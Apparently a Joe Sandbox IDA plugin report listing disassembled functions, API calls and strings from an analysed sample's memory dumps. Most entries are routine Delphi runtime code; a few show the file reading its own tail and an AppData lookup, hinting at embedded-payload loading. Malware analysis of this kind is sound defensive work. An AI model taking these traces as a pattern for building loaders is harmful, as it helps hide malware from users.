Function 00404208, Relevance: 3.1, APIs: 2, Instructions: 68

APIs

ExitProcess.KERNEL32(00000000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 004042C8

Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?), ref: 004041B5
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 004041BB
Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,00404204,00000002,?,00000000,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002), ref: 004041D0
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,00404204,00000002,?), ref: 004041D6
Part of subcall function 0040417C: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004041F4

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 00404290

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00404200, Relevance: 3.1, APIs: 2, Instructions: 65

APIs

ExitProcess.KERNEL32(00000000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 004042C8

Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?), ref: 004041B5
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 004041BB
Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,00404204,00000002,?,00000000,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002), ref: 004041D0
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,00404204,00000002,?), ref: 004041D6
Part of subcall function 0040417C: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004041F4

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 00404290

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00404204, Relevance: 3.1, APIs: 2, Instructions: 63

APIs

ExitProcess.KERNEL32(00000000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 004042C8

Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?), ref: 004041B5
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 004041BB
Part of subcall function 0040417C: GetStdHandle.KERNEL32(000000F5,00404204,00000002,?,00000000,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002), ref: 004041D0
Part of subcall function 0040417C: WriteFile.KERNEL32(00000000,000000F5,00404204,00000002,?), ref: 004041D6
Part of subcall function 0040417C: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004041F4

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?,?,?,?,0040CEEA,?,00000000), ref: 00404290

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CEBC, Relevance: 2.5, Strings: 2, Instructions: 29

Strings

AppData, xrefs: 0040CED6
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040CEDB

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00411200, Relevance: 1.6, APIs: 1, Instructions: 67

APIs

Part of subcall function 00405AB4: GetModuleHandleA.KERNEL32(00000000,?,0041121C), ref: 00405AC0

Part of subcall function 0040C714: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040C774
Part of subcall function 0040C714: SetFilePointer.KERNEL32(00000000,000000FC,00000000,00000002,00000000,0040C81F,?,?,?,00000000), ref: 0040C78A
Part of subcall function 0040C714: ReadFile.KERNEL32(00000000,004112E6,00000004,00000000,00000000), ref: 0040C79C
Part of subcall function 0040C714: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,000000FC,00000000,00000002,00000000,0040C81F,?,?,?,00000000), ref: 0040C7BB
Part of subcall function 0040C714: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040C7E5
Part of subcall function 0040C714: CloseHandle.KERNEL32(00000000), ref: 0040C7FF

Part of subcall function 00403064: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00000000,00000000,0040C759,00000000,0040C81F,?,?,?,00000000), ref: 00403088
Part of subcall function 00403064: GetCommandLineA.KERNEL32(?,00000000,00000000,0040C759,00000000,0040C81F,?,?,?,00000000), ref: 0040309A

EnumResourceNamesA.KERNEL32(00400000,0000000A,0040CFC0,00000000), ref: 004112C6

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00405930, Relevance: 1.5, APIs: 1, Instructions: 32

APIs

LoadStringA.USER32(00000000,0000FFF1,?,00001000), ref: 00405962

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004052B8, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 004052D6

Part of subcall function 0040551C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,0041278C), ref: 00405538
Part of subcall function 0040551C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,0041278C), ref: 00405556
Part of subcall function 0040551C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,0041278C), ref: 00405574
Part of subcall function 0040551C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405592
Part of subcall function 0040551C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004055DB
Part of subcall function 0040551C: RegQueryValueExA.ADVAPI32(?,00405788,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405621,?,80000001), ref: 004055F9
Part of subcall function 0040551C: RegCloseKey.ADVAPI32(?,00405628,00000000,?,?,00000000,00405621,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040561B
Part of subcall function 0040551C: lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405638
Part of subcall function 0040551C: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405645
Part of subcall function 0040551C: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040564B
Part of subcall function 0040551C: lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405676
Part of subcall function 0040551C: lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056BD
Part of subcall function 0040551C: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004056CD
Part of subcall function 0040551C: lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004056F5
Part of subcall function 0040551C: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405705
Part of subcall function 0040551C: lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040572B
Part of subcall function 0040551C: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 0040573B

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004014BC, Relevance: 1.3, APIs: 1, Instructions: 38

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401ACB), ref: 004014D2

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040CAD8, Relevance: 1.3, Strings: 1, Instructions: 34

Strings

Software\Microsoft, xrefs: 0040CB12

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040C9E0, Relevance: 1.3, APIs: 1, Instructions: 21

APIs

VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,00000000,0040CC3D,?,00000000,00000032,00000000,0040CDE0,?,00000000,00000000,?), ref: 0040C9F1

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00403FF4, Relevance: .0, Instructions: 41

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004110AC, Relevance: .0, Instructions: 31

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040405C, Relevance: .0, Instructions: 12

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Non-executed Functions

Function 00405358, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00406118,00400000,0041278C), ref: 00405375
GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,00406118,00400000,0041278C), ref: 0040538C
lstrcpynA.KERNEL32(?,?,?), ref: 004053BC
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405420

Part of subcall function 00405338: CharNextA.USER32(?), ref: 0040533F

lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405456
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405469
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 0040547B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000,0041278C), ref: 00405487
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118,00400000), ref: 004054BB
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00406118), ref: 004054C7
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 004054E9

Strings

kernel32.dll, xrefs: 00405370
\, xrefs: 00405499
GetLongPathNameA, xrefs: 00405383

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00405358, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00405375
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll), ref: 0040538C
lstrcpynA.KERNEL32(?,?,?), ref: 004053BC
lstrcpynA.KERNEL32(?,?,?,kernel32.dll), ref: 00405420

Part of subcall function 00405338: CharNextA.USER32(?), ref: 0040533F

lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 00405456
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405469
FindClose.KERNEL32(000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040547B
lstrlenA.KERNEL32(?,000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405487
lstrcpynA.KERNEL32(0000005D,?,00000104), ref: 004054BB
lstrlenA.KERNEL32(?,0000005D,?,00000104), ref: 004054C7
lstrcpynA.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 004054E9

Strings

\, xrefs: 00405499
GetLongPathNameA, xrefs: 00405383
kernel32.dll, xrefs: 00405370

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 00409758, Relevance: 1.5, APIs: 1, Instructions: 29

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409776

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 004097A4, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040ADD6,00000000,0040AFEF,?,?,00000000,00000000), ref: 004097B7

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 004081D8, Relevance: 1.5, APIs: 1, Instructions: 6

APIs

GetLocalTime.KERNEL32 ref: 004081DC

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 0040D854, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040D85D

Part of subcall function 0040D828: GetProcAddress.KERNEL32(00000000), ref: 0040D841

Strings

VarDateFromStr, xrefs: 0040D9CB
oleaut32.dll, xrefs: 0040D858
VarI4FromStr, xrefs: 0040D989
VarOr, xrefs: 0040D947
VarBstrFromBool, xrefs: 0040DA39
VarMul, xrefs: 0040D8D9
VarNeg, xrefs: 0040D881
VarR4FromStr, xrefs: 0040D99F
VarNot, xrefs: 0040D897
VarXor, xrefs: 0040D95D
VarSub, xrefs: 0040D8C3
VarAnd, xrefs: 0040D931
VarCyFromStr, xrefs: 0040D9E1
VarBoolFromStr, xrefs: 0040D9F7
VariantChangeTypeEx, xrefs: 0040D86B
VarBstrFromCy, xrefs: 0040DA0D
VarDiv, xrefs: 0040D8EF
VarBstrFromDate, xrefs: 0040DA23
VarCmp, xrefs: 0040D973
VarIdiv, xrefs: 0040D905
VarR8FromStr, xrefs: 0040D9B5
VarAdd, xrefs: 0040D8AD
VarMod, xrefs: 0040D91B

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004025E4, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 00402982

Strings

bytes: , xrefs: 00402811
7, xrefs: 00402755
An unexpected memory leak has occurred. , xrefs: 00402744
The unexpected small block leaks are:, xrefs: 004027BB
The sizes of unexpected leaked medium and large blocks are: , xrefs: 004028FD
Unknown, xrefs: 00402840
, xrefs: 004028C8
Unexpected Memory Leak, xrefs: 00402974
String, xrefs: 00402855

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004025E2, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 00402982

Strings

bytes: , xrefs: 00402811
7, xrefs: 00402755
An unexpected memory leak has occurred. , xrefs: 00402744
The unexpected small block leaks are:, xrefs: 004027BB
The sizes of unexpected leaked medium and large blocks are: , xrefs: 004028FD
, xrefs: 004028C8
Unexpected Memory Leak, xrefs: 00402974

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00409E58, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56

APIs

Part of subcall function 00409CD0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CED
Part of subcall function 00409CD0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D11
Part of subcall function 00409CD0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D2C
Part of subcall function 00409CD0: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DC2

CharToOemA.USER32(?,?), ref: 00409E8F
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,0040A5C9,0040A6EE,0040B608,00000000,0040B74C), ref: 00409EAC
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00409EB2
GetStdHandle.KERNEL32(000000F4,00409F1C,00000002,?,00000000,00000000,0040A5C9,0040A6EE,0040B608,00000000,0040B74C), ref: 00409EC7
WriteFile.KERNEL32(00000000,000000F4,00409F1C,00000002,?), ref: 00409ECD
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 00409EEF
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00409F05

Strings

D@A, xrefs: 00409E6C

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040E9B0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EA49
SafeArrayGetUBound.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040EA65
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040EA9E
SafeArrayPtrOfIndex.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040EB1B
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040EB34
VariantCopy.OLEAUT32(?), ref: 0040EB69

Strings

, xrefs: 0040E9CA

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040417C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002,?), ref: 004041B5
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 004041BB
GetStdHandle.KERNEL32(000000F5,00404204,00000002,?,00000000,00000000,?,00404243,?,?,?,00000002,004042EE,00402D7B,00402DC2,00000002), ref: 004041D0
WriteFile.KERNEL32(00000000,000000F5,00404204,00000002,?), ref: 004041D6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004041F4

Strings

Error, xrefs: 004041E8
Runtime error at 00000000, xrefs: 004041AE, 004041ED

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00401B54, Relevance: 12.2, APIs: 8, Instructions: 221

APIs

Part of subcall function 00401534: Sleep.KERNEL32(00000000,004015F1), ref: 0040154A
Part of subcall function 00401534: Sleep.KERNEL32(0000000A,00000000,004015F1), ref: 00401563

VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040160F
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00401632
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 0040163F
Sleep.KERNEL32(00000000,?), ref: 00401BEA
Sleep.KERNEL32(0000000A,00000000,?), ref: 00401C04
Sleep.KERNEL32(00000000), ref: 00401C2C
Sleep.KERNEL32(0000000A,00000000), ref: 00401C42
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401CFC

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040E39C, Relevance: 11.4, Strings: 9, Instructions: 152

Strings

]@, xrefs: 0040E4B4
\@, xrefs: 0040E500
<^@, xrefs: 0040E549
]@, xrefs: 0040E48E
$^@, xrefs: 0040E526
@, xrefs: 0040E558
4^@, xrefs: 0040E4DA
@, xrefs: 0040E4E9
,^@, xrefs: 0040E438

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00402F68, Relevance: 11.4, APIs: 9, Instructions: 110

APIs

CharNextA.USER32(-00000002), ref: 00402F74
CharNextA.USER32(00000000), ref: 00402FA2
CharNextA.USER32(00000000), ref: 00402FAC
CharNextA.USER32(00000000), ref: 00402FCB
CharNextA.USER32(00000000), ref: 00402FD5
CharNextA.USER32(00000000), ref: 00403001
CharNextA.USER32(00000000), ref: 0040300B
CharNextA.USER32(00000000), ref: 00403033
CharNextA.USER32(00000000), ref: 0040303D

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00401D4C, Relevance: 10.9, APIs: 7, Instructions: 407

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 004016D0
VirtualAlloc.KERNEL32(?,?,00002000,00000004), ref: 00401719
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000004), ref: 0040172F

Part of subcall function 004017D0: VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 0040159C
Part of subcall function 004017D0: Sleep.KERNEL32(00000000), ref: 00401887
Part of subcall function 004017D0: Sleep.KERNEL32(0000000A,00000000), ref: 0040189D
Part of subcall function 004017D0: Sleep.KERNEL32(00000000), ref: 004018CB
Part of subcall function 004017D0: Sleep.KERNEL32(0000000A,00000000), ref: 004018E1
Part of subcall function 004017D0: Sleep.KERNEL32(00000000), ref: 00401A10
Part of subcall function 004017D0: Sleep.KERNEL32(0000000A,00000000), ref: 00401A26

Part of subcall function 00401B54: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040160F
Part of subcall function 00401B54: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00401632
Part of subcall function 00401B54: VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 0040163F
Part of subcall function 00401B54: Sleep.KERNEL32(00000000,?), ref: 00401BEA
Part of subcall function 00401B54: Sleep.KERNEL32(0000000A,00000000,?), ref: 00401C04
Part of subcall function 00401B54: Sleep.KERNEL32(00000000), ref: 00401C2C
Part of subcall function 00401B54: Sleep.KERNEL32(0000000A,00000000), ref: 00401C42
Part of subcall function 00401B54: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401CFC

Sleep.KERNEL32(00000000,?), ref: 00401E6B
Sleep.KERNEL32(0000000A,00000000,?), ref: 00401E83
Sleep.KERNEL32(00000000,?,?), ref: 00401F54
Sleep.KERNEL32(0000000A,00000000,?,?), ref: 00401F6E

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 0040A330, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107

APIs

Part of subcall function 00405930: LoadStringA.USER32(00000000,0000FFF1,?,00001000), ref: 00405962

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4EB), ref: 0040A39B
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4EB), ref: 0040A3BD

Strings

|]@, xrefs: 0040A49C
Xf@, xrefs: 0040A452, 0040A4AE
t^@, xrefs: 0040A440

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00403644, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403666
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004036B5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403699
RegCloseKey.ADVAPI32(?,004036BC,00000000,?,00000004,00000000,004036B5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004036AF

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 0040365C
FPUMaskValue, xrefs: 00403690

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 004099E4, Relevance: 7.6, APIs: 5, Instructions: 50

APIs

GetThreadLocale.KERNEL32(?,00000000,00409A7B,?,?,00000000), ref: 004099FC

Part of subcall function 00409758: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409776

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A7B,?,?,00000000), ref: 00409A2C
EnumCalendarInfoA.KERNEL32(Function_00009930,00000000,00000000,00000004), ref: 00409A37
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A7B,?,?,00000000), ref: 00409A55
EnumCalendarInfoA.KERNEL32(Function_0000996C,00000000,00000000,00000003), ref: 00409A60

Memory Dump Source

Source File: 0000000A.00000001.248046088.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_FB_390E.jbxd

Function 00411154, Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 42

APIs

InitializeCriticalSection.KERNEL32(0041899C,00000000,004111F5), ref: 004111E2

Strings

X@, xrefs: 00411197
X@, xrefs: 00411187
0@, xrefs: 0041117D
h@, xrefs: 00411191

Memory Dump Source

Source File: 0000000A.00000002.256013044.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_FB_390E.jbxd

Function 00409A94, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C64,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AC3

Part of subcall function 00409758: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409776

Strings

eeee, xrefs: 00409BD2
ggg, xrefs: 00409BA9
yyyy, xrefs: 00409BB9

Memory Dump Source

